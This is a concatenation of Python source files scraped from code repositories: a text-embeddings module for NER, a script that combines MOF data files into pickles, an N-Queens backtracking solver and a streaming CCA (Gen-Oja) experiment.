re\nimport os\nfrom abc import ABC, abstractmethod\nfrom typing import List, Dict, Tuple\n\nimport gensim\nimport numpy as np\nimport torch\n\nfrom .file_utils import cached_path\nfrom .language_model import RNNModel\nfrom .data import Dictionary, Token, Sentence, TaggedCorpus\n\n\nclass TextEmbeddings(torch.nn.Module):\n \"\"\"Abstract base class for all embeddings. Ever new type of embedding must implement these methods.\"\"\"\n\n @property\n @abstractmethod\n def embedding_length(self) -> int:\n \"\"\"Returns the length of the embedding vector.\"\"\"\n pass\n\n @property\n def embedding_type(self) -> str:\n return 'word-level'\n\n def embed(self, sentences: List[Sentence]) -> List[Sentence]:\n \"\"\"Add embeddings to all words in a list of sentences. If embeddings are already added, updates only if embeddings\n are non-static.\"\"\"\n\n # if only one sentence is passed, convert to list of sentence\n if type(sentences) is Sentence:\n sentences = [sentences]\n\n everything_embedded: bool = True\n\n if self.embedding_type == 'word-level':\n for sentence in sentences:\n for token in sentence.tokens:\n if self.name not in token._embeddings.keys(): everything_embedded = False\n else:\n for sentence in sentences:\n if self.name not in sentence._embeddings.keys(): everything_embedded = False\n\n if not everything_embedded or not self.static_embeddings:\n self._add_embeddings_internal(sentences)\n\n return sentences\n\n @abstractmethod\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n \"\"\"Private method for adding embeddings to all words in a list of sentences.\"\"\"\n pass\n\n\nclass StackedEmbeddings(TextEmbeddings):\n \"\"\"A stack of embeddings, used if you need to combine several different embedding types.\"\"\"\n\n def __init__(self, embeddings: List[TextEmbeddings], detach: bool = True):\n \"\"\"The constructor takes a list of embeddings to be combined.\"\"\"\n super().__init__()\n\n self.embeddings = embeddings\n\n # IMPORTANT: add embeddings as torch modules\n for i, embedding in enumerate(embeddings):\n self.add_module('list_embedding_%s' % str(i), embedding)\n\n self.detach = detach\n self.name = 'Stack'\n self.static_embeddings = True\n\n self.__embedding_type: int = embeddings[0].embedding_type\n\n self.__embedding_length: int = 0\n for embedding in embeddings:\n self.__embedding_length += embedding.embedding_length\n\n def embed(self, sentences: List[Sentence], static_embeddings: bool = True):\n\n for embedding in self.embeddings:\n embedding.embed(sentences)\n\n @property\n def embedding_type(self):\n return self.__embedding_type\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n\n for embedding in self.embeddings:\n embedding._add_embeddings_internal(sentences)\n\n return sentences\n\n\nclass WordEmbeddings(TextEmbeddings):\n \"\"\"Standard static word embeddings, such as GloVe or FastText.\"\"\"\n\n def __init__(self, embeddings):\n \"\"\"Init one of: 'glove', 'extvec', 'ft-crawl', 'ft-german'.\n Constructor downloads required files if not there.\"\"\"\n\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/embeddings/'\n\n # GLOVE embeddings\n if embeddings.lower() == 'glove' or embeddings.lower() == 'en-glove':\n cached_path(os.path.join(base_path, 'glove.gensim.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'glove.gensim'), cache_dir='embeddings')\n\n # KOMNIOS embeddings\n if embeddings.lower() == 'extvec' or embeddings.lower() == 'en-extvec':\n cached_path(os.path.join(base_path, 'extvec.gensim.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'extvec.gensim'), cache_dir='embeddings')\n\n # NUMBERBATCH embeddings\n if embeddings.lower() == 'numberbatch' or embeddings.lower() == 'en-numberbatch':\n cached_path(os.path.join(base_path, 'numberbatch-en.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'numberbatch-en'), cache_dir='embeddings')\n\n # FT-CRAWL embeddings\n if embeddings.lower() == 'crawl' or embeddings.lower() == 'en-crawl':\n cached_path(os.path.join(base_path, 'ft-crawl.gensim.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'ft-crawl.gensim'), cache_dir='embeddings')\n\n # FT-CRAWL embeddings\n if embeddings.lower() == 'news' or embeddings.lower() == 'en-news':\n cached_path(os.path.join(base_path, 'ft-news.gensim.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'ft-news.gensim'), cache_dir='embeddings')\n\n # GERMAN FASTTEXT embeddings\n if embeddings.lower() == 'de-fasttext':\n cached_path(os.path.join(base_path, 'ft-wiki-de.gensim.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'ft-wiki-de.gensim'), cache_dir='embeddings')\n\n # NUMBERBATCH embeddings\n if embeddings.lower() == 'de-numberbatch':\n cached_path(os.path.join(base_path, 'de-numberbatch.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'de-numberbatch'), cache_dir='embeddings')\n\n # SWEDISCH FASTTEXT embeddings\n if embeddings.lower() == 'sv-fasttext':\n cached_path(os.path.join(base_path, 'cc.sv.300.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'cc.sv.300'), cache_dir='embeddings')\n\n self.name = embeddings\n self.static_embeddings = True\n\n self.precomputed_word_embeddings = gensim.models.KeyedVectors.load(embeddings)\n\n self.known_words = set(self.precomputed_word_embeddings.index2word)\n\n self.__embedding_length: int = self.precomputed_word_embeddings.vector_size\n super().__init__()\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]) -> List[Sentence]:\n\n for i, sentence in enumerate(sentences):\n\n for token, token_idx in zip(sentence.tokens, range(len(sentence.tokens))):\n token: Token = token\n\n if token.text in self.known_words:\n word_embedding = self.precomputed_word_embeddings[token.text]\n elif token.text.lower() in self.known_words:\n word_embedding = self.precomputed_word_embeddings[token.text.lower()]\n elif re.sub('\\d', '#', token.text.lower()) in self.known_words:\n word_embedding = self.precomputed_word_embeddings[re.sub('\\d', '#', token.text.lower())]\n elif re.sub('\\d', '0', token.text.lower()) in self.known_words:\n word_embedding = self.precomputed_word_embeddings[re.sub('\\d', '0', token.text.lower())]\n else:\n word_embedding = np.zeros(self.embedding_length, dtype='float')\n\n word_embedding = torch.autograd.Variable(torch.FloatTensor(word_embedding))\n token.set_embedding(self.name, word_embedding)\n\n return sentences\n\n\nclass CharacterEmbeddings(TextEmbeddings):\n \"\"\"Character embeddings of words, as proposed in Lample et al., 2016.\"\"\"\n\n def __init__(self, path_to_char_dict: str = None):\n \"\"\"Uses the default character dictionary if none provided.\"\"\"\n\n super(CharacterEmbeddings, self).__init__()\n self.name = 'Char'\n self.static_embeddings = False\n\n # get list of common characters if none provided\n if path_to_char_dict is None:\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/models/common_characters'\n char_dict = cached_path(base_path, cache_dir='datasets')\n\n # load dictionary\n self.char_dictionary: Dictionary = Dictionary()\n with open(char_dict, 'rb') as f:\n mappings = pickle.load(f, encoding='latin1')\n idx2item = mappings['idx2item']\n item2idx = mappings['item2idx']\n self.char_dictionary.item2idx = item2idx\n self.char_dictionary.idx2item = idx2item\n # print(self.char_dictionary.item2idx)\n\n self.char_embedding_dim: int = 25\n self.hidden_size_char: int = 25\n self.char_embedding = torch.nn.Embedding(len(self.char_dictionary.item2idx), self.char_embedding_dim)\n self.char_rnn = torch.nn.LSTM(self.char_embedding_dim, self.hidden_size_char, num_layers=1,\n bidirectional=True)\n\n self.__embedding_length = self.char_embedding_dim * 2\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n\n for sentence in sentences:\n\n tokens_char_indices = []\n\n # translate words in sentence into ints using dictionary\n for token in sentence.tokens:\n token: Token = token\n # print(token)\n char_indices = [self.char_dictionary.get_idx_for_item(char) for char in token.text]\n tokens_char_indices.append(char_indices)\n\n # sort words by length, for batching and masking\n tokens_sorted_by_length = sorted(tokens_char_indices, key=lambda p: len(p), reverse=True)\n d = {}\n for i, ci in enumerate(tokens_char_indices):\n for j, cj in enumerate(tokens_sorted_by_length):\n if ci == cj:\n d[j] = i\n continue\n chars2_length = [len(c) for c in tokens_sorted_by_length]\n longest_token_in_sentence = max(chars2_length)\n tokens_mask = np.zeros((len(tokens_sorted_by_length), longest_token_in_sentence), dtype='int')\n for i, c in enumerate(tokens_sorted_by_length):\n tokens_mask[i, :chars2_length[i]] = c\n\n tokens_mask = torch.autograd.Variable(torch.LongTensor(tokens_mask))\n\n # chars for rnn processing\n chars = tokens_mask\n if torch.cuda.is_available():\n chars = chars.cuda()\n\n character_embeddings = self.char_embedding(chars).transpose(0, 1)\n\n packed = torch.nn.utils.rnn.pack_padded_sequence(character_embeddings, chars2_length)\n\n lstm_out, self.hidden = self.char_rnn(packed)\n\n outputs, output_lengths = torch.nn.utils.rnn.pad_packed_sequence(lstm_out)\n outputs = outputs.transpose(0, 1)\n chars_embeds_temp = torch.autograd.Variable(\n torch.FloatTensor(torch.zeros((outputs.size(0), outputs.size(2)))))\n if torch.cuda.is_available():\n chars_embeds_temp = chars_embeds_temp.cuda()\n for i, index in enumerate(output_lengths):\n chars_embeds_temp[i] = outputs[i, index - 1]\n character_embeddings = chars_embeds_temp.clone()\n for i in range(character_embeddings.size(0)):\n character_embeddings[d[i]] = chars_embeds_temp[i]\n\n for token_number, token in enumerate(sentence.tokens):\n token.set_embedding(self.name, character_embeddings[token_number].cpu())\n\n\nclass CharLMEmbeddings(TextEmbeddings):\n \"\"\"Contextual string embeddings of words, as proposed in Akbik et al., 2018.\"\"\"\n\n def __init__(self, model, detach: bool = True):\n super().__init__()\n\n \"\"\"\n Contextual string embeddings of words, as proposed in Akbik et al., 2018.\n\n Parameters\n ----------\n arg1 : model\n model string, one of 'news-forward', 'news-backward', 'mix-forward', 'mix-backward', 'german-forward',\n 'german-backward' depending on which character language model is desired\n arg2 : detach\n if set to false, the gradient will propagate into the language model. this dramatically slows down\n training and often leads to worse results, so not recommended.\n \"\"\"\n\n # news-english-forward\n if model.lower() == 'news-forward':\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/embeddings/lm-news-english-forward.pt'\n model = cached_path(base_path, cache_dir='embeddings')\n\n # news-english-backward\n if model.lower() == 'news-backward':\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/embeddings/lm-news-english-backward.pt'\n model = cached_path(base_path, cache_dir='embeddings')\n\n # mix-english-forward\n if model.lower() == 'mix-forward':\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/embeddings/lm-mix-english-forward.pt'\n model = cached_path(base_path, cache_dir='embeddings')\n\n # mix-english-backward\n if model.lower() == 'mix-backward':\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/embeddings/lm-mix-english-backward.pt'\n model = cached_path(base_path, cache_dir='embeddings')\n\n # mix-english-forward\n if model.lower() == 'german-forward':\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/embeddings/lm-mix-german-forward.pt'\n model = cached_path(base_path, cache_dir='embeddings')\n\n # mix-english-backward\n if model.lower() == 'german-backward':\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/embeddings/lm-mix-german-backward.pt'\n model = cached_path(base_path, cache_dir='embeddings')\n\n self.name = model\n self.static_embeddings = detach\n\n self.lm: RNNModel = RNNModel.load_language_model(model)\n if torch.cuda.is_available():\n self.lm = self.lm.cuda()\n self.lm.eval()\n\n self.detach = detach\n\n self.is_forward_lm: bool = self.lm.is_forward_lm\n if self.is_forward_lm:\n print('FORWARD language mode loaded')\n else:\n print('BACKWARD language mode loaded')\n\n print('on cuda:')\n print(next(self.lm.parameters()).is_cuda)\n\n dummy_sentence: Sentence = Sentence()\n dummy_sentence.add_token(Token('hello'))\n embedded_dummy = self.embed([dummy_sentence])\n self.__embedding_length: int = len(embedded_dummy[0].get_token(1).get_embedding())\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]) -> List[Sentence]:\n\n # find longest sentence by characters\n longest_character_sequence_in_batch: int = 0\n for sentence in sentences:\n if len(\n sentence.to_plain_string()) > longest_character_sequence_in_batch: longest_character_sequence_in_batch \\\n = len(sentence.to_plain_string())\n\n sentences_padded: List[str] = []\n\n for sentence in sentences:\n if self.is_forward_lm:\n sentences_padded.append(\n '\\n' + sentence.to_plain_string() + ' ' + (\n (longest_character_sequence_in_batch - len(sentence.to_plain_string())) * ' '))\n else:\n sentences_padded.append(\n '\\n' + sentence.to_plain_string()[::-1] + ' ' + (\n (longest_character_sequence_in_batch - len(sentence.to_plain_string())) * ' '))\n\n # print(sentences_padded)\n\n # get states from LM\n all_hidden_states_in_lm = self.lm.get_representation(sentences_padded, self.detach)\n\n for i, sentence in enumerate(sentences):\n\n offset_forward: int = 1\n offset_backward: int = len(sentence.to_plain_string()) + 1\n\n for token, token_idx in zip(sentence.tokens, range(len(sentence.tokens))):\n token: Token = token\n\n offset_forward += len(token.text)\n\n if self.is_forward_lm:\n offset = offset_forward\n else:\n offset = offset_backward\n\n embedding = all_hidden_states_in_lm[offset, i, :].data.cpu()\n # if not torch.cuda.is_available():\n # embedding = embedding.cpu()\n\n offset_forward += 1\n\n offset_backward -= 1\n offset_backward -= len(token.text)\n\n token.set_embedding(self.name, torch.autograd.Variable(embedding))\n self.__embedding_length = len(embedding)\n\n return sentences\n\n\nclass OnePassStoreEmbeddings(TextEmbeddings):\n def __init__(self, embedding_stack: StackedEmbeddings, corpus: TaggedCorpus, detach: bool = True):\n super().__init__()\n\n self.embedding_stack = embedding_stack\n self.detach = detach\n self.name = 'Stack'\n self.static_embeddings = True\n\n self.__embedding_length: int = embedding_stack.embedding_length\n print(self.embedding_length)\n\n sentences = corpus.get_all_sentences()\n mini_batch_size: int = 32\n sentence_no: int = 0\n written_embeddings: int = 0\n\n total_count = 0\n for sentence in sentences:\n for token in sentence.tokens:\n total_count += 1\n\n embeddings_vec = 'fragment_embeddings.vec'\n with open(embeddings_vec, 'a') as f:\n\n f.write('%d %d\\n' % (total_count, self.embedding_stack.embedding_length))\n\n batches = [sentences[x:x + mini_batch_size] for x in\n range(0, len(sentences), mini_batch_size)]\n\n for batch in batches:\n\n self.embedding_stack.embed(batch)\n\n for sentence in batch:\n sentence: Sentence = sentence\n sentence_no += 1\n print('%d\\t(%d)' % (sentence_no, written_embeddings))\n # lines: List[str] = []\n\n for token in sentence.tokens:\n token: Token = token\n\n signature = self.get_signature(token)\n vector = token.get_embedding().data.numpy().tolist()\n vector = ' '.join(map(str, vector))\n vec = signature + ' ' + vector\n # lines.append(vec)\n written_embeddings += 1\n token.clear_embeddings()\n\n f.write('%s\\n' % vec)\n\n vectors = gensim.models.KeyedVectors.load_word2vec_format(embeddings_vec, binary=False)\n vectors.save('stored_embeddings')\n import os\n os.remove('fragment_embeddings.vec')\n vectors = None\n\n self.embeddings = WordEmbeddings('stored_embeddings')\n\n def get_signature(self, token: Token) -> str:\n context: str = ' '\n for i in range(token.idx - 4, token.idx + 5):\n if token.sentence.get_token(i) is not None:\n context += token.sentence.get_token(i).text + ' '\n signature = '%s··%d:··%s' % (token.text, token.idx, context)\n return signature.strip().replace(' ', '·')\n\n def embed(self, sentences: List[Sentence], static_embeddings: bool = True):\n\n for sentence in sentences:\n for token in sentence.tokens:\n signature = self.get_signature(token)\n word_embedding = self.embeddings.precomputed_word_embeddings.get_vector(signature)\n word_embedding = torch.autograd.Variable(torch.FloatTensor(word_embedding))\n token.set_embedding(self.name, word_embedding)\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n return sentences\n\n\nclass TextMeanEmbedder(TextEmbeddings):\n\n def __init__(self, word_embeddings: List[TextEmbeddings], reproject_words: bool = True):\n \"\"\"The constructor takes a list of embeddings to be combined.\"\"\"\n super().__init__()\n\n self.embeddings: StackedEmbeddings = StackedEmbeddings(embeddings=word_embeddings)\n self.name: str = 'word_mean'\n self.reproject_words: bool = reproject_words\n self.static_embeddings: bool = not reproject_words\n\n self.__embedding_length: int = 0\n self.__embedding_length = self.embeddings.embedding_length\n\n self.word_reprojection_map = torch.nn.Linear(self.__embedding_length, self.__embedding_length)\n\n @property\n def embedding_type(self):\n return 'sentence-level'\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def embed(self, paragraphs: List[Sentence]):\n \"\"\"Add embeddings to every sentence in the given list of sentences. If embeddings are already added, updates\n only if embeddings are non-static.\"\"\"\n\n everything_embedded: bool = True\n\n # if only one sentence is passed, convert to list of sentence\n if type(paragraphs) is Sentence:\n paragraphs = [paragraphs]\n\n for paragraph in paragraphs:\n if self.name not in paragraph._embeddings.keys(): everything_embedded = False\n\n if not everything_embedded or not self.static_embeddings:\n\n self.embeddings.embed(paragraphs)\n\n for paragraph in paragraphs:\n word_embeddings = []\n for token in paragraph.tokens:\n token: Token = token\n word_embeddings.append(token.get_embedding().unsqueeze(0))\n\n word_embeddings = torch.cat(word_embeddings, dim=0)\n if torch.cuda.is_available():\n word_embeddings = word_embeddings.cuda()\n\n if self.reproject_words:\n word_embeddings = self.word_reprojection_map(word_embeddings)\n\n mean_embedding = torch.mean(word_embeddings, 0)\n\n # mean_embedding /= len(paragraph.tokens)\n paragraph.set_embedding(self.name, mean_embedding)\n\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n pass\n\n\nclass TextLSTMEmbedder(TextEmbeddings):\n\n def __init__(self, word_embeddings: List[TextEmbeddings], hidden_states=128, num_layers=1,\n reproject_words: bool = True):\n \"\"\"The constructor takes a list of embeddings to be combined.\"\"\"\n super().__init__()\n\n # self.embeddings: StackedEmbeddings = StackedEmbeddings(embeddings=word_embeddings)\n self.embeddings: List[TextEmbeddings] = word_embeddings\n\n self.reproject_words = reproject_words\n\n self.length_of_all_word_embeddings = 0\n for word_embedding in self.embeddings:\n self.length_of_all_word_embeddings += word_embedding.embedding_length\n\n self.name = 'text_lstm'\n self.static_embeddings = False\n\n # self.__embedding_length: int = hidden_states\n self.__embedding_length: int = hidden_states * 2\n\n # bidirectional LSTM on top of embedding layer\n self.word_reprojection_map = torch.nn.Linear(self.length_of_all_word_embeddings,\n self.length_of_all_word_embeddings)\n self.rnn = torch.nn.LSTM(self.length_of_all_word_embeddings, hidden_states, num_layers=num_layers,\n bidirectional=True)\n self.dropout = torch.nn.Dropout(0.5)\n\n @property\n def embedding_type(self):\n return 'sentence-level'\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def embed(self, sentences: List[Sentence]):\n \"\"\"Add embeddings to all sentences in the given list of sentences. If embeddings are already added, update\n only if embeddings are non-static.\"\"\"\n\n self.rnn.zero_grad()\n\n sentences.sort(key=lambda x: len(x), reverse=True)\n\n for word_embedding in self.embeddings:\n word_embedding.embed(sentences)\n\n # first, sort sentences by number of tokens\n longest_token_sequence_in_batch: int = len(sentences[0])\n\n all_sentence_tensors = []\n lengths: List[int] = []\n\n # go through each sentence in batch\n for i, sentence in enumerate(sentences):\n\n lengths.append(len(sentence.tokens))\n\n word_embeddings = []\n\n for token, token_idx in zip(sentence.tokens, range(len(sentence.tokens))):\n token: Token = token\n word_embeddings.append(token.get_embedding().unsqueeze(0))\n\n # PADDING: pad shorter sentences out\n for add in range(longest_token_sequence_in_batch - len(sentence.tokens)):\n word_embeddings.append(\n torch.autograd.Variable(\n torch.FloatTensor(np.zeros(self.length_of_all_word_embeddings, dtype='float')).unsqueeze(0)))\n\n word_embeddings_tensor = torch.cat(word_embeddings, 0)\n\n sentence_states = word_embeddings_tensor\n\n # ADD TO SENTENCE LIST: add the representation\n all_sentence_tensors.append(sentence_states.unsqueeze(1))\n\n # --------------------------------------------------------------------\n # GET REPRESENTATION FOR ENTIRE BATCH\n # --------------------------------------------------------------------\n sentence_tensor = torch.cat(all_sentence_tensors, 1)\n if torch.cuda.is_available():\n sentence_tensor = sentence_tensor.cuda()\n\n # --------------------------------------------------------------------\n # FF PART\n # --------------------------------------------------------------------\n if self.reproject_words:\n sentence_tensor = self.word_reprojection_map(sentence_tensor)\n\n sentence_tensor = self.dropout(sentence_tensor)\n\n packed = torch.nn.utils.rnn.pack_padded_sequence(sentence_tensor, lengths)\n\n lstm_out, hidden = self.rnn(packed)\n outputs, output_lengths = torch.nn.utils.rnn.pad_packed_sequence(lstm_out)\n\n outputs = self.dropout(outputs)\n\n for i, sentence in enumerate(sentences):\n embedding = outputs[output_lengths[i].item() - 1, i]\n sentence.set_embedding(self.name, embedding)\n\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n pass\n\n\nclass TextLMEmbedder(TextEmbeddings):\n def __init__(self, charlm_embeddings: List[CharLMEmbeddings], detach: bool = True):\n super().__init__()\n\n self.embeddings = charlm_embeddings\n\n self.static_embeddings = detach\n self.detach = detach\n\n dummy: Sentence = Sentence('jo')\n self.embed([dummy])\n self._embedding_length: int = len(dummy.embedding)\n\n @property\n def embedding_length(self) -> int:\n return self._embedding_length\n\n @property\n def embedding_type(self):\n return 'sentence-level'\n\n def embed(self, sentences: List[Sentence]):\n\n for embedding in self.embeddings:\n embedding.embed(sentences)\n\n # iterate over sentences\n for sentence in sentences:\n\n # if its a forward LM, take last state\n if embedding.is_forward_lm:\n sentence.set_embedding(embedding.name, sentence[len(sentence)]._embeddings[embedding.name])\n else:\n sentence.set_embedding(embedding.name, sentence[1]._embeddings[embedding.name])\n\n return sentences\n\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n pass\n","repo_name":"navbehl/text_processing","sub_path":"ner/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":28082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"4384450723","text":"'''\ncombing each material data into one file\n将单独的理论数据tsv文件整合进一个pickle文件\n'''\n\nimport os\nimport numpy as np\nimport pandas as pd\n\nall_data_path = r'/home/wanghong/work/MOF_project/2019_11_3MOF/20191002mofdata'\n\ndata = pd.DataFrame()\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# 创建空的容器\nlabel = []\n\n# 'test data'\n# test_file = r'/home/wanghong/work/MOF_project/2019_9MOF/20191002mofdata/149068 MOF HOCHEM.tsv'\n# one_data = pd.read_csv(test_file, sep='\\t', header=None)\n# one_data_column = pd.DataFrame(one_data.iloc[:,-1])\n# print(one_data_column.type)\n\nfor i, file_name in enumerate(os.listdir(all_data_path)):\n\n\tone_data_path = os.path.join(all_data_path, file_name)\n\n\tif one_data_path[-3:] != 'tsv': \t\t\t\t\t\t\t\t\t\t# 只有tsv结尾的文件数据能被读取\n\t\tcontinue\n\n\tone_data = pd.read_csv(one_data_path, sep='\\t', header=None)\t\t# 分离数据\n\tone_data_column = pd.DataFrame(one_data.iloc[:,-1])\t\t\t\t\t\t# 数据分为两列,第一列1-50间隔0.2,无用。取第二列对应的理论值\n\n\tone_data_row = one_data_column.T \t\t\t\t\t\t\t\t\t\t# 列数据转置成行数据\n\tdata = pd.concat([data, one_data_row])\t\t\t\t\t\t\t\t\t\t# 将每次读取的单个数据和前面读取的数据合并\n\n\t# print((file_name.split()[-1])[:-4]) \t\t\t\t\t\t\t\t\t\t#ex: UCOQEK.tsv remove .tsv\n\n\tlabel.append(((file_name.split()[-1])[:-4]))\n\npd.to_pickle(data, \"prep_theo_data.pickle\" )\npd.to_pickle(label, \"prep_theo_label.pickle\")\nprint('output lable type is: {}'.format(type(label)))\nprint('output lable length is: {}'.format(len(label)))\n\n# print(label) \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# 打印查看全部的label,看是佛有数字或不正确的的lable存在其中\n","repo_name":"NANBFTOP5/MOF","sub_path":"new train code/combine_each_data2onefile.py","file_name":"combine_each_data2onefile.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30737011603","text":"\"\"\"\nPlace N Queens on an NxN chessboard, in such a manner that no two queens attack each other. \nA queen can move horizontally, vertically, and diagonally.\n\n - Start in the leftmost column.\n - If all the queens are placed\n return true\n - Try all rows in the current column. Do the following for every tried row.\n - If the queen can be placed safely in this row, then mark this [row, column] as part of the\n solution and recursively check if placing the queen here leads to a solution.\n - If placing the queen in [row, column] leads to a solution, return true.\n - If placing the queen in [row, column] doesn’t lead to a solution, then unmark this [row, column] \n and go to the first step to try other rows.\n - If all rows have been tried and nothing worked, return false to trigger backtracking.\n\n\n\n\"\"\"\n\nclass NQueens:\n\n def __init__(self, n) -> None:\n self.n = n\n self.chess_table =[[0 for i in range(n)] for j in range(n)]\n\n def print_queens(self):\n for i in range(self.n):\n for j in range(self.n):\n if self.chess_table[i][j] == 1:\n print(\" Q \", end=' ')\n else:\n print(\" - \", end=' ')\n print(\"\\n\")\n\n def is_place_safe(self, row_index, col_index):\n for i in range(self.n):\n if self.chess_table[row_index][i] ==1:\n return False\n\n j = col_index\n for i in range(row_index, -1, -1):\n if i < 0:\n break\n if self.chess_table[i][j] ==1:\n return False\n j = j -1\n \n j = col_index\n for i in range(row_index, self.n):\n if i < 0:\n break\n if self.chess_table[i][j] == 1:\n return False\n\n j = j -1\n\n return True\n\n def solve(self, col_index):\n if col_index == self.n:\n return True\n\n for row_index in range(self.n):\n if self.is_place_safe(row_index, col_index):\n self.chess_table[row_index][col_index] =1\n if self.solve(col_index+1):\n return True\n self.chess_table[row_index][col_index] = 0\n return False\n\n def solve_NQueens(self):\n if self.solve(0):\n self.print_queens()\n else:\n print(\"No solution exists for the problem\")\n\n\nqueens = NQueens(2)\nqueens.solve_NQueens()\n\n\n\n# q =NQueens(8)\n# print(q.chess_table)\n# print(\"gggggggggggggggggggg\")\n# q.print_queens()\n\nfrom typing import List\n\nclass Solution:\n\n def solveNQueens(self, n: int) ->List[List[str]]:\n col = set()\n posDiag =set() # (r + c)\n negDiag =set() # (r - c)\n\n res =[]\n board =[[\".\"] *n for i in range(n)]\n\n def backtrack(r):\n if r == n:\n copy =[\"\".join(row) for row in board]\n res.append(copy)\n return\n \n for c in range(n):\n if c in col or (r+c) in posDiag or (r-c) in negDiag:\n continue\n\n col.add(c)\n posDiag.add(r + c)\n negDiag.add(r-c)\n board[r][c] =\"Q\"\n\n backtrack(r +1)\n\n col.remove(c)\n posDiag.remove(r +c)\n negDiag.remove(r-c)\n board[r][c]=\".\"\n backtrack(0)\n return res\n\nsol =Solution()\nprint(sol.solveNQueens(4))\n","repo_name":"Chemokoren/Algorithms-1","sub_path":"Backtracking/n_queens.py","file_name":"n_queens.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"18965617335","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 23 17:19:25 2022\n\n@author: WILL LIU\n\"\"\"\nimport numpy as np\n\ndef genoja(X,Y,n,eta_1=0.0005,eta_2=0.005,iterations = False):\n '''\n Input:\n X,Y: data\n n: number of target components\n eta1,eta2: learning rate\n iterations: max iteration. If False, run all the points in dataset\n Output:\n a,b: canonical correlation components\n corr_list: correlation during the iterations\n '''\n \n #initialization and random starting value\n length,m = X.shape\n np.random.seed(999999999)\n V = np.random.randn(m*2,n)\n V,_ = np.linalg.qr(V, mode='reduced')\n U = np.random.randn(m*2,n)\n U,_ = np.linalg.qr(U, mode='reduced')\n\n #if iterations is not set, run all the samples in the dataset\n if iterations==False:\n max_iter = length//100\n else:\n max_iter = iterations//100\n corr_mat = np.zeros((max_iter,n))\n \n #iterations\n for j in range(max_iter):\n\n #store the result every 100 iterations\n for i in range(100):\n\n #initialize the cov matrices\n ind = j*100+i\n x = X[ind,:]\n y = Y[ind,:]\n c12 = np.outer(x,y)\n c11 = np.outer(x,x)\n c22 = np.outer(y,y)\n \n #initialize A\n A = np.zeros((m*2,m*2))\n A[:m,m:] = c12\n A[m:,:m] = c12.T\n \n #initialize B\n B = np.zeros((m*2,m*2))\n B[0:m,0:m] = c11\n B[m:m*2,m:m*2] = c22\n \n #two-step process\n U -= eta_2*(B@U-A@V)\n V += eta_1*U\n a = V[:m]\n a,r = np.linalg.qr(a, mode='reduced')\n a = a*np.sign(np.diagonal(r))#avoid switching sign in QR\n \n b = V[m:]\n b,r = np.linalg.qr(b, mode='reduced')\n b = b*np.sign(np.diagonal(r))#avoid switching sign in QR\n V[:m] = a\n V[m:] = b\n \n #record the result\n a = V[:m]\n b = V[m:]\n X_s = X@a\n Y_s = Y@b\n for k in range(n):\n corr_mat[j,k] = np.corrcoef(X_s.T,Y_s.T)[n+k,k]\n\n return a,b,corr_mat\n\n\nif __name__=='__main__':\n import matplotlib.pyplot as plt\n from sklearn.cross_decomposition import CCA\n\n #test on the sythetic data\n length = 50000\n l1 = np.random.normal(size=length)\n l2 = np.random.normal(size=length)\n l3 = np.random.normal(size=length)\n\n latents = np.array([l1, l1*0.5, l1*0.25, l2*0.7, l2*0.3, l3*0.5]).T\n X = latents + np.random.normal(size=6 * length).reshape((length, 6))*0.5\n Y = latents + np.random.normal(size=6 * length).reshape((length, 6))*0.5\n\n X = X-X.mean(axis=0)\n Y = Y-Y.mean(axis=0)\n\n #theoretical value\n n=3\n a,b,corr_list = genoja(X,Y,n,eta_1=0.0005,eta_2=0.005)\n cca = CCA(n_components=n)\n cca.fit(X, Y)\n X_c, Y_c = cca.transform(X, Y)\n \n for i in range(n):\n plt.plot(np.array(list(range(1,length//100+1)))*100,corr_list[:,i],label='streaming')\n plt.plot([100,50000],[np.corrcoef(X_c.T,Y_c.T)[n+i,i],np.corrcoef(X_c.T,Y_c.T)[n+i,i]],label='built-in')\n plt.xlabel('iterations')\n plt.ylabel('correlation')\n 